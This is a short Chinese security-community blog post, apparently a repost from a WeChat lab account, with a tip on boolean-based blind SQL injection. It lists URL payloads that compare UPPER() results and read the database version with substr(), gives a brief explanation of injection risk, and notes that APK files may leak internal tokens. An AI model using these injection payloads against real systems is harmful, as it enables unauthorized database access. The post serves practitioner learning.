安全娱乐圈之攻防技术交流系列文章 第6弹

  • A+
所属分类:安全文章


安全娱乐圈之攻防技术交流系列文章 第6弹


1


在一次测试中,发现存在SQL盲注的 URI 为:


http://xxx.xxx.xxx.xxx/item/default %INJECTIONPOINTHERE%


首先访问


http://xxx.xxx.xxx.xxx/item/default'and%20UPPER('asd')='asd'--


页面返回 404


继续访问


http://xxx.xxx.xxx.xxx/item/default'and%20UPPER('asd')='ASD'--


页面返回 200


继续盲注


http://xxx.xxx.xxx.xxx/item/default'and%20substr(version(),1,1)='2'-- ==> will give you 200 OK
http://xxx.xxx.xxx.xxx/item/default'and%20substr(version(),2,1)='0'-- ==> will give you 200 OK


如果在用户可控制的输入中没有进行充分的过滤,则生成的SQL查询可能导致用户输入被解释为SQL而不是普通用户数据。这可用于更改查询逻辑以绕过安全检查,或用于插入修改后端数据库的其他语句,甚至有可能执行系统命令。


2


在一些apk文件中,有可能获取到内部令牌,从而有可能进一步获取敏感信息。


星光不问赶路人,岁月不负有心人!

安全娱乐圈之攻防技术交流系列文章 第6弹

    加油,网安人!


“攻防技术交流”这一个系列的文章

主要记录日常实战与学习交流的

攻防思路与心得体会

如果你有新奇的攻防idea

非常欢迎与小伙伴们一起分享交流

VX群暗号

后台回复“ 技术交流 ”获取

入群须知:

纯技术交流群禁止灌水

长期潜水不分享交流的会进行清理

希望大家予以理解


安全娱乐圈之攻防技术交流系列文章 第6弹

● 安全娱乐圈之攻防技术交流系列文章 第1弹

● 安全娱乐圈之攻防技术交流系列文章 第2弹

● 安全娱乐圈之攻防技术交流系列文章 第3弹

● 安全娱乐圈之攻防技术交流系列文章 第4弹

● 安全娱乐圈之攻防技术交流系列文章 第5弹

本文始发于微信公众号(西子实验室):安全娱乐圈之攻防技术交流系列文章 第6弹

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: